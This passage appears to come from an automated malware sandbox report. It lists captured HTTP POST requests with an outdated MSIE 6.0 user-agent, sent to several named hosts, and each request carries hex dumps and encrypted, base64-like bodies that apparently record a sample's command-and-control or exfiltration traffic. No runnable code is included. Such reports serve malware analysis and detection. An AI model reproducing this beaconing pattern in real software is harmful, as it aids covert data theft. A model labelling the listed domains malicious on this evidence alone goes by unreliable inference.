57 46 78 43 30 4f 41 4f 65 63 6b 6b 59 42 5a 2b 41 4f 74 56 64 44 45 62 4a 79 41 6b 57 6e 33 47 38 2f 31 79 4e 55 6b 34 43 6f 55 46 34 62 57 71 6d 61 4d 4d 48 6e 74 69 67 79 36 74 30 32 42 2b 35 63 67 46 6b 58 68 6a 43 6c 66 2b 33 4a 53 6a 74 70 4d 71 54 4b 53 6c 61 49 62 70 39 4f 31 71 77 47 41 44 73 65 73 4d 45 68 55 45 41 65 54 5a 69 6c 67 75 2f 6f 4d 62 62 50 45 6d 6d 49 37 6e 72 6f 56 42 4f 49 50 45 43 57 68 6e 50 69 72 34 64 7a 66 59 5a 78 41 63 4c 55 36 4e 68 49 3d Data Ascii: wFBe7UfB+9IGtLg3dg0pIhBHgLE9UyAaa3mHMA1i3gKjdNhD4WyCXaFChX8HKaLxVYCRWr5h/eqJBR0tQRi/+FsBIFQXiPHsSbgufG0ghnLVJnNY8mNpWAeq9K/uw7IzYNpqQpTmWrpPMtVUjXNnAgFGA47iNgnWl9/seDaqtaKuYD0FHfnCjjn+g5bcUGWv+8H3h8MXRRZT6c9NJ6cewBg9LDKdlOsyYoRpSqFVYZD3Or1Bk/V8KOQuFyeAEOKzuH4vlWeInRZ55tSBKrZiiLuRKybtpQbUZa8liXn3UAaNyZtQ2/1Ttu99Hyb6Z5pXbRQYHmQyGpeVMWLgODrkhYe1z2VUwzp9kr/Fw81Sor4u5tgaQ5/fj3pwM05t3T33sM9IFKZlLF9CEvJ15r5h2Ml534RgexHd7WFxC0OAOeckkYBZ+AOtVdDEbJyAkWn3G8/1yNUk4CoUF4bWqmaMMHntigy6t02B+5cgFkXhjClf+3JSjtpMqTKSlaIbp9O1qwGADsesMEhUEAeTZilgu/oMbbPEmmI7nroVBOIPECWhnPir4dzfYZxAcLU6NhI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 78 76 51 69 42 64 71 47 2f 4e 49 2f 64 4b 73 4c 2f 61 68 47 76 42 32 46 4b 32 62 4b 6e 7a 58 32 72 73 36 36 63 4b 48 41 67 4b 59 4b 57 49 76 55 65 52 6c 78 6b 42 53 73 6c 6e 61 5a 4f 46 78 66 73 67 43 51 4e 38 39 55 44 4e 7a 72 50 63 47 32 4a 43 51 31 52 56 78 4b 35 45 59 44 49 4d 76 33 50 73 6e 61 53 53 44 59 7a 75 47 6d 31 5a 48 32 44 33 6d 52 43 37 41 6c 57 34 6a 79 66 67 34 39 59 77 33 72 7a 32 70 50 54 46 51 65 65 39 76 4a 77 52 62 71 71 70 37 55 54 38 49 48 6f 7a 79 2b 30 6a 59 72 6c 4d 38 66 6d 41 37 61 70 73 53 6f 42 4a 65 76 30 58 47 51 69 4a 56 69 56 42 32 57 6c 2f 34 62 66 32 6f 72 50 49 66 53 50 31 45 6b 79 32 7a 6a 58 51 69 38 50 59 6d 55 6e 4b 47 35 58 6c 4a 6d 32 53 43 58 4b 61 47 6a 72 59 55 38 7a 72 4c 45 68 4a 47 56 6f 6b 4e 48 76 59 30 63 39 70 42 74 36 6a 32 70 48 79 69 4d 6a 6a 70 6c 42 76 34 4c 41 46 4c 47 48 41 35 36 76 73 6c 4c 54 79 66 58 51 70 4f 51 45 70 4b 36 57 49 42 54 45 73 37 50 35 62 54 30 56 61 6a 6b 69 77 58 45 4d 65 44 46 7a 6c 55 6c 31 6c 36 31 34 58 62 42 7a 45 33 74 64 33 55 6e 45 6a 74 6b 47 6d 43 64 4c 63 71 48 45 62 58 6f 35 6a 76 35 4a 6b 34 69 7a 47 46 2f 68 72 2f 47 6f 6f 53 57 49 30 63 4e 73 36 63 30 6e 61 6d 54 6d 76 7a 6e 44 4d 49 36 45 39 71 35 6b 61 45 61 34 50 71 31 37 75 4b 42 46 33 65 76 4f 42 6f 33 79 46 58 4e 50 31 45 71 67 54 4e 51 6e 46 61 4b 67 62 52 46 31 61 69 43 75 43 6d 7a 35 35 45 4f 73 33 72 44 33 4c 70 35 61 48 38 48 75 30 59 31 73 77 52 76 6d 42 4e 48 78 77 52 42 69 7a 51 35 43 64 2b 59 71 70 71 63 75 38 4e 55 58 74 73 77 4e 35 56 41 7a 70 2f 31 68 30 37 68 4c 77 4d 45 74 39 32 4b 56 49 65 4f 36 63 55 3d Data Ascii: xvQiBdqG/NI/dKsL/ahGvB2FK2bKnzX2rs66cKHAgKYKWIvUeRlxkBSslnaZOFxfsgCQN89UDNzrPcG2JCQ1RVxK5EYDIMv3PsnaSSDYzuGm1ZH2D3mRC7AlW4jyfg49Yw3rz2pPTFQee9vJwRbqqp7UT8IHozy+0jYrlM8fmA7apsSoBJev0XGQiJViVB2Wl/4bf2orPIfSP1Eky2zjXQi8PYmUnKG5XlJm2SCXKaGjrYU8zrLEhJGVokNHvY0c9pBt6j2pHyiMjjplBv4LAFLGHA56vslLTyfXQpOQEpK6WIBTEs7P5bT0VajkiwXEMeDFzlUl1l614XbBzE3td3UnEjtkGmCdLcqHEbXo5jv5Jk4izGF/hr/GooSWI0cNs6c0namTmvznDMI6E9q5kaEa4Pq17uKBF3evOBo3yFXNP1EqgTNQnFaKgbRF1aiCuCmz55EOs3rD3Lp5aH8Hu0Y1swRvmBNHxwRBizQ5Cd+Yqpqcu8NUXtswN5VAzp/1h07hLwMEt92KVIeO6cU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 74 74 6e 62 64 49 74 70 6a 35 72 4b 75 6a 2f 4b 34 72 46 58 69 50 54 4c 55 6d 33 52 75 67 64 2f 37 79 4d 6a 5a 44 68 76 43 45 39 5a 6d 4b 7a 65 6b 52 45 43 68 31 34 52 58 47 43 46 6c 4b 2f 42 63 69 7a 76 39 30 78 76 62 4d 73 72 65 43 6b 66 48 50 54 4e 65 70 4f 48 42 6a 2f 39 44 73 4a 52 39 31 5a 70 76 33 67 59 52 4f 5a 35 6f 6b 6e 4d 45 69 62 57 71 54 71 50 4d 50 33 67 62 68 44 35 4b 76 4e 6a 4d 7a 45 69 4e 62 6d 73 42 76 59 6b 63 4f 41 49 69 77 36 57 45 33 4e 78 59 58 51 69 69 66 77 42 6e 36 6d 73 47 43 58 48 76 56 54 73 6b 77 69 69 4a 76 79 61 7a 33 74 2b 63 70 45 70 47 43 4d 63 67 66 53 59 4d 38 59 61 63 6f 69 35 42 50 6f 32 53 39 30 39 58 74 43 30 56 54 53 32 46 70 4c 2b 66 45 72 2f 66 6e 71 49 38 57 32 32 32 67 64 37 68 38 2f 64 6f 52 4b 7a 69 50 6c 74 39 4b 50 56 36 32 47 54 79 46 64 79 5a 4b 34 63 59 4d 61 6d 52 30 44 37 4d 67 36 69 72 42 45 6a 63 45 37 6c 46 34 53 4f 53 4d 69 34 42 54 50 6a 64 50 50 50 6c 45 61 7a 70 51 35 46 4f 68 31 54 76 7a 71 36 45 43 34 75 46 35 72 4d 76 51 6e 6b 35 50 73 4c 79 42 59 63 74 5a 68 48 6c 6f 42 70 4d 31 32 58 6a 47 4b 71 6c 78 64 4f 62 39 77 42 44 6c 73 6c 76 33 41 49 4c 56 50 30 6e 32 58 56 6a 2b 52 67 4a 75 6b 2f 47 68 6a 71 31 6b 56 71 4b 45 61 63 77 2b 35 37 70 66 34 69 64 71 75 33 43 2f 6c 4f 4b 6e 65 4f 31 49 6b 39 6a 4e 47 2f 39 62 66 2f 6c 32 52 38 31 43 79 63 56 48 51 4e 6a 6e 38 31 4c 7a 7a 51 47 59 58 51 44 51 79 61 53 57 31 34 76 59 31 4f 46 58 51 74 4d 7a 4d 31 31 68 61 52 4e 32 5a 53 38 2b 77 68 39 38 57 61 76 36 62 56 32 56 52 39 75 46 51 34 7a 6c 51 43 48 4b 74 34 64 74 46 4e 30 50 2b 70 65 68 43 68 49 41 2b 6f 62 4e 63 54 47 31 59 64 59 43 63 46 39 4b 67 79 46 59 4f 66 4f 6c 53 6d 4c 4e 4d 3d Data Ascii: ttnbdItpj5rKuj/K4rFXiPTLUm3Rugd/7yMjZDhvCE9ZmKzekRECh14RXGCFlK/Bcizv90xvbMsreCkfHPTNepOHBj/9DsJR91Zpv3gYROZ5oknMEibWqTqPMP3gbhD5KvNjMzEiNbmsBvYkcOAIiw6WE3NxYXQiifwBn6msGCXHvVTskwiiJvyaz3t+cpEpGCMcgfSYM8Yacoi5BPo2S909XtC0VTS2FpL+fEr/fnqI8W222gd7h8/doRKziPlt9KPV62GTyFdyZK4cYMamR0D7Mg6irBEjcE7lF4SOSMi4BTPjdPPPlEazpQ5FOh1Tvzq6EC4uF5rMvQnk5PsLyBYctZhHloBpM12XjGKqlxdOb9wBDlslv3AILVP0n2XVj+RgJuk/Ghjq1kVqKEacw+57pf4idqu3C/lOKneO1Ik9jNG/9bf/l2R81CycVHQNjn81LzzQGYXQDQyaSW14vY1OFXQtMzM11haRN2ZS8+wh98Wav6bV2VR9uFQ4zlQCHKt4dtFN0P+pehChIA+obNcTG1YdYCcF9KgyFYOfOlSmLNM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 69 2b 76 31 55 63 52 56 42 39 50 68 75 57 65 72 33 32 59 65 51 4a 63 31 32 70 6a 38 34 55 39 66 4f 47 63 6f 50 75 4f 4b 57 71 62 51 4b 64 34 63 67 66 69 4e 49 62 51 6a 35 78 6a 65 45 33 46 65 65 6f 73 4c 2b 6f 68 56 42 57 48 31 45 4f 4c 4e 58 59 45 5a 34 36 39 52 77 54 32 45 52 30 35 42 30 6f 6a 71 74 57 2f 5a 59 54 69 6c 49 37 32 47 79 41 63 54 4c 34 32 78 7a 32 36 57 4f 64 57 6f 6c 6a 4e 36 4f 77 76 75 78 2b 43 43 50 79 4a 63 2b 42 47 44 56 30 6b 45 43 62 39 4c 51 43 53 43 78 4c 4e 4c 4c 62 31 70 68 36 33 56 45 69 76 48 31 45 44 63 72 6b 77 45 6e 47 56 74 34 37 56 6e 32 66 52 2f 49 66 58 69 32 70 6f 74 65 32 6a 78 43 47 6a 47 77 72 63 50 74 2b 70 38 65 79 75 67 61 2f 4b 75 4e 6b 76 31 68 38 53 2f 65 61 7a 67 63 35 74 47 61 76 45 32 39 56 67 46 30 31 61 6e 50 78 5a 37 67 75 4b 41 34 69 54 65 78 66 75 59 34 6c 43 77 4b 45 52 70 44 72 38 39 6d 57 79 67 32 55 77 41 6a 50 78 51 7a 34 4b 51 2b 6f 56 6a 56 6a 2f 48 6d 38 6a 49 4b 62 70 6d 36 75 64 6c 55 57 6f 66 47 2b 4d 50 77 4c 32 4c 42 37 63 51 73 7a 4b 44 78 76 32 77 4e 52 42 6e 57 57 56 31 76 66 63 68 6a 62 6c 51 57 30 7a 79 50 45 41 72 36 31 76 75 71 4f 4a 67 55 38 6c 37 34 69 59 62 51 47 58 4d 5a 71 4d 42 7a 4a 52 58 41 2f 46 4f 50 55 7a 6d 6d 4c 66 45 61 4b 45 54 75 71 79 50 37 73 35 75 36 4a 4d 50 39 67 6d 52 2b 4a 70 46 45 52 77 4f 4e 61 6b 55 2b 66 75 6e 2b 78 56 53 4a 52 69 2b 72 58 4f 75 61 38 6f 5a 65 5a 48 49 37 73 75 47 31 37 57 64 59 69 6a 37 41 7a 4c 37 54 72 6e 41 4c 30 46 2f 77 6b 56 41 55 6c 71 46 61 58 56 5a 65 6b 4b 7a 2f 66 59 4e 52 41 64 74 78 41 47 59 77 6b 47 47 66 78 73 6d 35 36 61 48 31 69 73 6c 45 61 6a 74 79 6f 33 48 51 44 35 30 78 76 33 6d 32 35 6e 4b 53 6c 63 50 38 50 43 79 32 44 50 45 76 53 31 31 4c 47 4b 59 6c 38 58 30 Data Ascii: i+v1UcRVB9PhuWer32YeQJc12pj84U9fOGcoPuOKWqbQKd4cgfiNIbQj5xjeE3FeeosL+ohVBWH1EOLNXYEZ469RwT2ER05B0ojqtW/ZYTilI72GyAcTL42xz26WOdWoljN6Owvux+CCPyJc+BGDV0kECb9LQCSCxLNLLb1ph63VEivH1EDcrkwEnGVt47Vn2fR/IfXi2pote2jxCGjGwrcPt+p8eyuga/KuNkv1h8S/eazgc5tGavE29VgF01anPxZ7guKA4iTexfuY4lCwKERpDr89mWyg2UwAjPxQz4KQ+oVjVj/Hm8jIKbpm6udlUWofG+MPwL2LB7cQszKDxv2wNRBnWWV1vfchjblQW0zyPEAr61vuqOJgU8l74iYbQGXMZqMBzJRXA/FOPUzmmLfEaKETuqyP7s5u6JMP9gmR+JpFERwONakU+fun+xVSJRi+rXOua8oZeZHI7suG17WdYij7AzL7TrnAL0F/wkVAUlqFaXVZekKz/fYNRAdtxAGYwkGGfxsm56aH1islEajtyo3HQD50xv3m25nKSlcP8PCy2DPEvS11LGKYl8X0
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 41 55 77 66 64 67 68 30 6a 35 6f 56 54 70 72 65 53 77 65 37 6b 6e 75 67 64 76 65 51 70 78 76 77 76 4f 65 31 78 39 63 68 69 36 56 4b 37 2f 79 6e 53 69 2b 49 2b 79 36 63 58 4b 78 48 65 61 54 36 68 34 50 6b 6c 2f 37 5a 62 41 5a 6f 7a 33 47 41 45 54 47 55 4d 46 67 4c 36 31 76 43 61 68 32 6a 4b 65 6c 45 42 71 6b 38 46 43 57 33 54 73 48 72 4f 78 47 41 4c 4f 76 79 2f 78 71 46 55 6f 61 4b 53 70 74 47 34 31 36 63 45 6e 71 41 36 77 56 5a 4e 51 48 72 74 33 71 55 30 49 75 58 2f 41 6e 2b 69 58 56 5a 33 34 44 44 47 42 6b 64 4e 46 50 4c 6a 75 6e 30 70 45 2b 51 46 56 4f 32 70 43 56 76 30 55 73 4f 6c 4b 43 74 70 73 45 6e 75 53 4e 53 64 2b 72 32 50 53 55 52 6d 74 70 63 35 32 2b 34 69 35 64 34 44 53 39 6e 52 6c 59 75 79 37 51 34 35 47 6a 58 51 35 30 31 32 75 67 2b 32 41 58 52 58 76 34 57 4e 43 44 48 48 50 35 67 6d 70 59 6c 57 62 6f 55 72 31 4e 6a 46 51 48 66 68 30 30 53 55 34 46 38 63 67 77 34 68 63 32 2b 5a 39 41 68 63 2f 74 61 6f 5a 61 67 4e 6f 64 42 75 76 37 59 6a 50 34 4a 32 58 6d 6f 4e 6f 48 4d 65 4f 47 59 70 48 61 37 77 54 53 57 58 30 76 79 54 50 33 34 33 36 2f 7a 66 6a 59 33 70 4a 55 43 79 46 68 63 75 6e 63 47 64 79 33 36 59 76 53 4d 66 4e 6c 4e 73 65 4c 50 45 59 64 6c 2b 4a 57 2f 6e 6a 6e 34 44 76 31 30 50 5a 4a 72 46 55 31 54 76 42 52 67 71 41 45 74 34 6b 6b 6b 45 54 4a 53 79 67 4f 58 4d 36 63 76 4a 34 6f 53 6c 47 63 4a 73 4d 71 64 56 57 67 66 30 7a 4b 45 4b 53 41 4b 35 6a 6f 71 43 4f 42 5a 69 4d 39 49 38 57 69 4b 45 59 38 61 72 6f 30 33 79 45 30 78 5a 42 66 31 52 53 56 77 70 2f 79 42 68 79 6b 6a 45 35 50 5a 71 47 66 36 32 4e 7a 31 52 49 73 44 77 74 6a 5a 4a 73 44 58 6b 54 77 32 43 4b 79 58 2f 55 52 6b 43 77 75 43 2b 64 74 72 6b 35 77 66 34 6e 61 6f 73 32 6d 63 6f 35 79 54 30 37 2f 71 2f 56 43 34 38 53 61 57 62 5a 51 33 77 35 57 37 69 56 30 5a 53 61 47 50 34 47 51 3d Data Ascii: AUwfdgh0j5oVTpreSwe7knugdveQpxvwvOe1x9chi6VK7/ynSi+I+y6cXKxHeaT6h4Pkl/7ZbAZoz3GAETGUMFgL61vCah2jKelEBqk8FCW3TsHrOxGALOvy/xqFUoaKSptG416cEnqA6wVZNQHrt3qU0IuX/An+iXVZ34DDGBkdNFPLjun0pE+QFVO2pCVv0UsOlKCtpsEnuSNSd+r2PSURmtpc52+4i5d4DS9nRlYuy7Q45GjXQ5012ug+2AXRXv4WNCDHHP5gmpYlWboUr1NjFQHfh00SU4F8cgw4hc2+Z9Ahc/taoZagNodBuv7YjP4J2XmoNoHMeOGYpHa7wTSWX0vyTP3436/zfjY3pJUCyFhcuncGdy36YvSMfNlNseLPEYdl+JW/njn4Dv10PZJrFU1TvBRgqAEt4kkkETJSygOXM6cvJ4oSlGcJsMqdVWgf0zKEKSAK5joqCOBZiM9I8WiKEY8aro03yE0xZBf1RSVwp/yBhykjE5PZqGf62Nz1RIsDwtjZJsDXkTw2CKyX/URkCwuC+dtrk5wf4naos2mco5yT07/q/VC48SaWbZQ3w5W7iV0ZSaGP4GQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 56 4b 35 32 44 44 39 6b 44 64 4d 57 50 56 63 52 48 69 51 31 46 4d 6a 34 39 51 47 56 72 58 6e 56 34 31 66 4b 34 7a 35 54 57 58 63 50 54 5a 48 61 31 55 4f 73 4f 6d 52 4a 53 68 7a 6a 59 50 72 53 52 5a 6f 56 72 41 57 4c 53 6e 4f 76 6f 5a 58 2b 39 45 56 4a 75 4a 6a 4c 35 48 79 58 34 36 42 39 31 6c 6f 46 38 59 4e 4c 6e 44 69 2b 46 37 37 71 67 4b 73 2b 57 6b 62 63 66 51 4d 4a 45 53 4f 6a 49 66 46 50 61 66 30 2f 4c 6f 69 76 61 37 31 64 77 7a 6f 48 64 56 62 4b 66 6b 72 49 69 78 62 79 39 64 42 52 37 6c 43 4e 56 41 46 33 54 37 4f 38 56 48 62 77 65 64 7a 78 48 45 36 4a 77 70 53 38 2f 75 53 6a 56 5a 32 4f 70 67 41 72 72 64 4b 57 2f 6e 38 62 62 4a 47 66 72 77 53 33 42 6c 30 41 34 30 61 63 35 69 5a 55 42 58 76 44 67 48 5a 5a 65 5a 71 56 41 38 59 6e 2b 6f 37 78 39 5a 52 36 50 6a 65 45 4b 6b 4d 45 75 4c 38 63 56 62 65 63 30 64 78 64 53 4e 6d 48 68 49 4a 69 4c 4c 78 65 59 63 74 41 73 76 79 73 7a 4d 4b 66 6e 48 76 46 33 71 58 75 53 44 71 6a 52 39 6c 49 42 71 6a 69 64 52 77 6b 7a 48 53 4b 4c 34 4a 64 45 6b 6e 31 66 4e 49 70 54 41 41 36 46 44 41 46 68 6d 35 68 35 4c 6f 2f 4c 32 6d 79 45 65 67 59 67 5a 75 4f 4a 65 65 6f 66 38 50 6b 41 36 49 46 6f 42 30 63 56 71 62 32 37 41 76 47 59 41 62 39 47 39 63 49 37 46 50 72 78 35 31 51 48 4e 75 62 63 4a 4e 73 63 36 36 61 2f 39 59 2b 6a 45 48 73 33 4f 58 6e 2f 6d 71 31 56 49 51 32 39 4e 39 42 45 61 6c 49 4a 73 6b 51 31 38 63 31 34 73 37 49 49 6e 43 53 73 67 51 57 76 68 73 46 71 31 4c 4d 75 38 69 65 61 41 33 2f 78 53 43 78 32 6d 4c 4f 52 64 62 2b 5a 4f 4f 2b 57 51 32 35 2f 37 4e 36 32 6d 65 70 37 78 51 5a 78 74 72 79 50 41 61 71 57 6e 79 2f 79 64 55 31 6f 39 75 42 36 74 6c 44 4e 4e 43 34 65 33 36 76 2f 76 38 76 78 52 6c 48 2b 56 61 36 77 70 4e 38 76 36 54 61 68 42 57 77 38 63 51 6e 78 67 34 31 33 74 49 59 4a 73 5a 33 65 67 4c 73 Data Ascii: VK52DD9kDdMWPVcRHiQ1FMj49QGVrXnV41fK4z5TWXcPTZHa1UOsOmRJShzjYPrSRZoVrAWLSnOvoZX+9EVJuJjL5HyX46B91loF8YNLnDi+F77qgKs+WkbcfQMJESOjIfFPaf0/Loiva71dwzoHdVbKfkrIixby9dBR7lCNVAF3T7O8VHbwedzxHE6JwpS8/uSjVZ2OpgArrdKW/n8bbJGfrwS3Bl0A40ac5iZUBXvDgHZZeZqVA8Yn+o7x9ZR6PjeEKkMEuL8cVbec0dxdSNmHhIJiLLxeYctAsvyszMKfnHvF3qXuSDqjR9lIBqjidRwkzHSKL4JdEkn1fNIpTAA6FDAFhm5h5Lo/L2myEegYgZuOJeeof8PkA6IFoB0cVqb27AvGYAb9G9cI7FPrx51QHNubcJNsc66a/9Y+jEHs3OXn/mq1VIQ29N9BEalIJskQ18c14s7IInCSsgQWvhsFq1LMu8ieaA3/xSCx2mLORdb+ZOO+WQ25/7N62mep7xQZxtryPAaqWny/ydU1o9uB6tlDNNC4e36v/v8vxRlH+Va6wpN8v6TahBWw8cQnxg413tIYJsZ3egLs
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 43 4a 4d 75 55 72 54 70 6e 70 71 5a 32 5a 38 48 44 34 6b 79 4f 67 63 6a 6c 63 47 73 62 4d 43 31 4b 4c 72 78 62 51 51 77 41 54 76 34 77 75 33 4b 66 6c 73 7a 5a 79 74 55 37 6a 47 58 6c 68 43 74 41 53 43 65 38 68 50 6d 6c 31 75 62 55 61 34 44 43 42 43 41 35 6e 2f 45 37 52 4c 6b 6d 2b 64 62 4f 36 30 50 4f 44 70 4e 33 41 46 65 78 4a 57 74 6f 39 43 42 58 77 79 74 64 49 47 57 31 57 70 4e 72 43 77 37 4a 43 7a 44 6d 4c 51 78 30 35 4b 34 66 66 38 67 52 79 6d 73 68 36 2b 2b 48 50 72 48 78 64 4a 6e 41 31 41 34 36 30 43 6a 50 4f 67 79 4e 56 6a 79 36 63 63 68 44 6d 62 65 76 78 43 52 79 46 51 6c 66 6b 78 4d 38 34 64 4d 77 48 37 35 57 6d 58 65 53 4a 63 50 75 6e 73 6a 68 6e 4e 7a 37 70 6d 6d 38 61 4c 6b 65 6c 67 58 31 77 47 5a 34 77 30 65 43 52 5a 66 4e 2b 53 51 36 57 78 6c 4e 62 42 38 4b 33 76 48 46 62 78 66 34 77 44 53 7a 59 63 54 32 6a 2b 75 78 7a 37 59 31 61 6b 37 58 34 33 6e 32 33 42 56 56 55 53 58 66 6a 65 49 79 70 30 45 56 56 6b 72 6b 34 68 49 79 71 74 4a 49 45 6e 74 31 50 41 42 75 62 4a 6c 61 33 79 56 68 6d 4f 55 64 47 34 44 36 43 4f 47 6f 6d 42 45 30 4a 79 4e 78 34 34 35 74 41 48 65 62 46 33 77 6a 76 2b 66 67 2b 48 58 73 44 45 53 56 48 73 78 72 38 45 2f 42 61 58 34 4d 49 4e 2b 59 4f 76 41 68 7a 55 77 73 68 4a 62 68 61 7a 58 64 6f 75 4d 4e 68 2f 50 47 71 4f 6d 31 4a 57 4a 43 72 77 55 71 78 66 44 61 4f 51 56 64 36 47 6f 67 66 77 43 30 71 73 53 41 42 5a 2f 61 37 4f 63 45 30 36 7a 61 43 4e 59 52 74 2f 43 55 79 66 46 49 6e 37 58 45 6a 4b 76 62 65 58 4f 52 2f 71 73 48 2b 30 57 73 6c 41 44 46 77 71 38 30 55 6c 32 47 6f 49 53 36 46 38 48 44 4f 2b 73 4e 52 57 61 62 62 53 74 53 45 61 70 56 52 6d 77 62 34 34 7a 52 50 67 69 77 58 51 46 42 48 61 5a 30 38 4a 34 73 39 2f 44 6c 35 34 39 4e 73 2f 42 6d 69 6b 36 45 4f 70 45 7a 34 36 46 34 4f 75 45 Data Ascii: CJMuUrTpnpqZ2Z8HD4kyOgcjlcGsbMC1KLrxbQQwATv4wu3KflszZytU7jGXlhCtASCe8hPml1ubUa4DCBCA5n/E7RLkm+dbO60PODpN3AFexJWto9CBXwytdIGW1WpNrCw7JCzDmLQx05K4ff8gRymsh6++HPrHxdJnA1A460CjPOgyNVjy6cchDmbevxCRyFQlfkxM84dMwH75WmXeSJcPunsjhnNz7pmm8aLkelgX1wGZ4w0eCRZfN+SQ6WxlNbB8K3vHFbxf4wDSzYcT2j+uxz7Y1ak7X43n23BVVUSXfjeIyp0EVVkrk4hIyqtJIEnt1PABubJla3yVhmOUdG4D6COGomBE0JyNx445tAHebF3wjv+fg+HXsDESVHsxr8E/BaX4MIN+YOvAhzUwshJbhazXdouMNh/PGqOm1JWJCrwUqxfDaOQVd6GogfwC0qsSABZ/a7OcE06zaCNYRt/CUyfFIn7XEjKvbeXOR/qsH+0WslADFwq80Ul2GoIS6F8HDO+sNRWabbStSEapVRmwb44zRPgiwXQFBHaZ08J4s9/Dl549Ns/Bmik6EOpEz46F4OuE
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 69 2b 76 31 55 63 52 56 42 39 50 68 75 57 65 72 33 32 59 65 51 4a 63 31 32 70 6a 38 34 55 39 66 4f 47 63 6f 50 75 4f 4b 57 71 62 51 4b 64 34 63 67 66 69 4e 49 62 51 6a 35 78 6a 65 45 33 46 65 65 6f 73 4c 2b 6f 68 56 42 57 48 31 45 4f 4c 4e 58 59 45 5a 34 36 39 52 77 54 32 45 52 30 35 42 30 6f 6a 71 74 57 2f 5a 59 54 69 6c 49 37 32 47 79 41 63 54 4c 34 32 78 7a 32 36 57 4f 64 57 6f 6c 6a 4e 36 4f 77 76 75 78 2b 43 43 50 79 4a 63 2b 42 47 44 56 30 6b 45 43 62 39 4c 51 43 53 43 78 4c 4e 4c 4c 62 31 70 68 36 33 56 45 69 76 48 31 45 44 63 72 6b 77 45 6e 47 56 74 34 37 56 6e 32 66 52 2f 49 66 58 69 32 70 6f 74 65 32 6a 78 43 47 6a 47 77 72 63 50 74 2b 70 38 65 79 75 67 61 2f 4b 75 4e 6b 76 31 68 38 53 2f 65 61 7a 67 63 35 74 47 61 76 45 32 39 56 67 46 30 31 61 6e 50 78 5a 37 67 75 4b 41 34 69 54 65 78 66 75 59 34 6c 43 77 4b 45 52 70 44 72 38 39 6d 57 79 67 32 55 77 41 6a 50 78 51 7a 34 4b 51 2b 6f 56 6a 56 6a 2f 48 6d 38 6a 49 4b 62 70 6d 36 75 64 6c 55 57 6f 66 47 2b 4d 50 77 4c 32 4c 42 37 63 51 73 7a 4b 44 78 76 32 77 4e 52 42 6e 57 57 56 31 76 66 63 68 6a 62 6c 51 57 30 7a 79 50 45 41 72 36 31 76 75 71 4f 4a 67 55 38 6c 37 34 69 59 62 51 47 58 4d 5a 71 4d 42 7a 4a 52 58 41 2f 46 4f 50 55 7a 6d 6d 4c 66 45 61 4b 45 54 75 71 79 50 37 73 35 75 36 4a 4d 50 39 67 6d 52 2b 4a 70 46 45 52 77 4f 4e 61 6b 55 2b 66 75 6e 2b 78 56 53 4a 52 69 2b 72 58 4f 75 61 38 6f 5a 65 5a 48 49 37 73 75 47 31 37 57 64 59 69 6a 37 41 7a 4c 37 54 72 6e 41 4c 30 46 2f 77 6b 56 41 55 6c 71 46 61 58 56 5a 65 6b 4b 7a 2f 66 59 4e 52 41 64 74 78 41 47 59 77 6b 47 47 66 78 73 6d 35 36 61 48 31 69 73 6c 45 61 6a 74 79 6f 33 48 51 44 35 30 78 76 33 6d 32 35 6e 4b 53 6c 63 50 38 50 43 79 32 44 50 45 76 53 31 31 4c 47 4b 59 6c 38 58 30 Data Ascii: i+v1UcRVB9PhuWer32YeQJc12pj84U9fOGcoPuOKWqbQKd4cgfiNIbQj5xjeE3FeeosL+ohVBWH1EOLNXYEZ469RwT2ER05B0ojqtW/ZYTilI72GyAcTL42xz26WOdWoljN6Owvux+CCPyJc+BGDV0kECb9LQCSCxLNLLb1ph63VEivH1EDcrkwEnGVt47Vn2fR/IfXi2pote2jxCGjGwrcPt+p8eyuga/KuNkv1h8S/eazgc5tGavE29VgF01anPxZ7guKA4iTexfuY4lCwKERpDr89mWyg2UwAjPxQz4KQ+oVjVj/Hm8jIKbpm6udlUWofG+MPwL2LB7cQszKDxv2wNRBnWWV1vfchjblQW0zyPEAr61vuqOJgU8l74iYbQGXMZqMBzJRXA/FOPUzmmLfEaKETuqyP7s5u6JMP9gmR+JpFERwONakU+fun+xVSJRi+rXOua8oZeZHI7suG17WdYij7AzL7TrnAL0F/wkVAUlqFaXVZekKz/fYNRAdtxAGYwkGGfxsm56aH1islEajtyo3HQD50xv3m25nKSlcP8PCy2DPEvS11LGKYl8X0
